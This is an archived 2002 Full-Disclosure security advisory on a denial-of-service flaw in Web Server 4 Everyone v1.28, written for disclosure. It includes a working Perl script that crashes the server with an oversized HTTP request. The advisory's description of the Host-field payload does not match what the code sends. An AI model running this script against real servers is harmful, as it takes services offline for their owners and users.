[Full-Disclosure] [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability

From: Tamer Sahin (ts@securityoffice.net)
Date: 10/23/02

• Next message: Mandrake Linux Security Team: "[Full-Disclosure] MDKSA-2002:070 - tetex update"
• Previous message: skyper: "[Full-Disclosure] RE: 7350reass (who's responsible)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Tamer Sahin <ts@securityoffice.net> (Tamer Sahin)
Date: Wed, 23 Oct 2002 12:14:22 +0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services.
Web Server 4 Everyone is available for Microsoft Windows operating systems.

http://www.freeware.lt/Info/projects.php

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000
characters "web4all.exe" just shuts down. This vulnerability also affects Web Server 4
Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains
all "127.0.0.1", the server crashes. In case you send a request that size without adding
the "Host:" there is no effect on running program. The Web server must be restarted to
regain normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of
any of the information and/or the software listed on this security advisory.

- --[ Author

Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedback@securityoffice.net

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security
Advisory is not modified in any way and is attributed to SecurityOffice and provided
that such reproduction and distribution is performed for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPbZocPpL5ibJRTtBAQFygAgAh+O2QmmJ6knUs+kgf2/yfdzG/EFSx7ti
+cByVWgyj/QEgM2fazeDyCEnjBLkcET8jkCivq7aDLG77iTsrKdCaJf9eo+L0uhW
EL3E0c5U+oV4V4gipvk0hDrwI7heKfF9ASDEiqv9XxfObf9PNUOqYagsCx7lkTgu
ea7gizKa3VGdhRaguVjdz8DPBBQwSDYiQKAFlTgHi52FEwtdoj9VrFP4sUNmjkd+
2HP6mOdxEs2GqObIVziwI32FMeTTwDuMXdb4e9Ht3ZxkvPEcsI+GEU1K5erRTzng
5g62L5VRbKgCLXto0kFykQZkjSo9v13bexmvMcdTBlvG7um4mbc38g==
=G28B
-----END PGP SIGNATURE-----

• Next message: Mandrake Linux Security Team: "[Full-Disclosure] MDKSA-2002:070 - tetex update"
• Previous message: skyper: "[Full-Disclosure] RE: 7350reass (who's responsible)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [UNIX] File Disclosure Vulnerability in Simple Web Server ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Beyond Security would like to welcome Tiscali World Online ... Simple Web Server is a Linux-based web server. ... 08/29/2002 Issue disclosed to iDEFENSE ... (Securiteam) [NT] Poisoning Cached HTTPS Documents in Internet Explorer ... Get your security news from a reliable source. ... "poison" a user's browser cache with a malicious document that will later ... The attacker can exploit this vulnerability for "replacing" HTML ... to communicate with a malicious web server over HTTPS without the browser ... (Securiteam) [NT] Webserver 4D Weak Password Preservation Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... complete Web Server environment written entirely on top of 4th Dimension, ... WS4D web server saves the passwords somewhere insecure. ... (Securiteam) Re: 2003 Web Server Security flaw ... "Locked-down windows 2003 Web Server used only to host web sites". ... What is your logic/rationale for Media Player being a required install ... The Media Player patch was the ONLY that FAILED. ... > When talking about computer security, there are areas that have no such ... (microsoft.public.windows.server.security) Web session tracking security prob. Vulnerable: IIS and ColdFusion (maybe others) ... SECURITY PROBLEMS WITH WEB SERVERS' SESSION TRACKING MECHANISMS. ... 2001 we reported the following problem (with specifics to IIS and SITESERVER) to the Microsoft Security Response Center. ... These vulnerabilities, especially when combined with well-known cross-site scripting vulnerabilities, could cause loss of confidentiality, failure of non-repudiation and fraud. ... The browser stores and returns the "ASPSESSIONID" or "CFID/CFTOKEN" values with each subsequent request to the web server. ... (Vuln-Dev)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint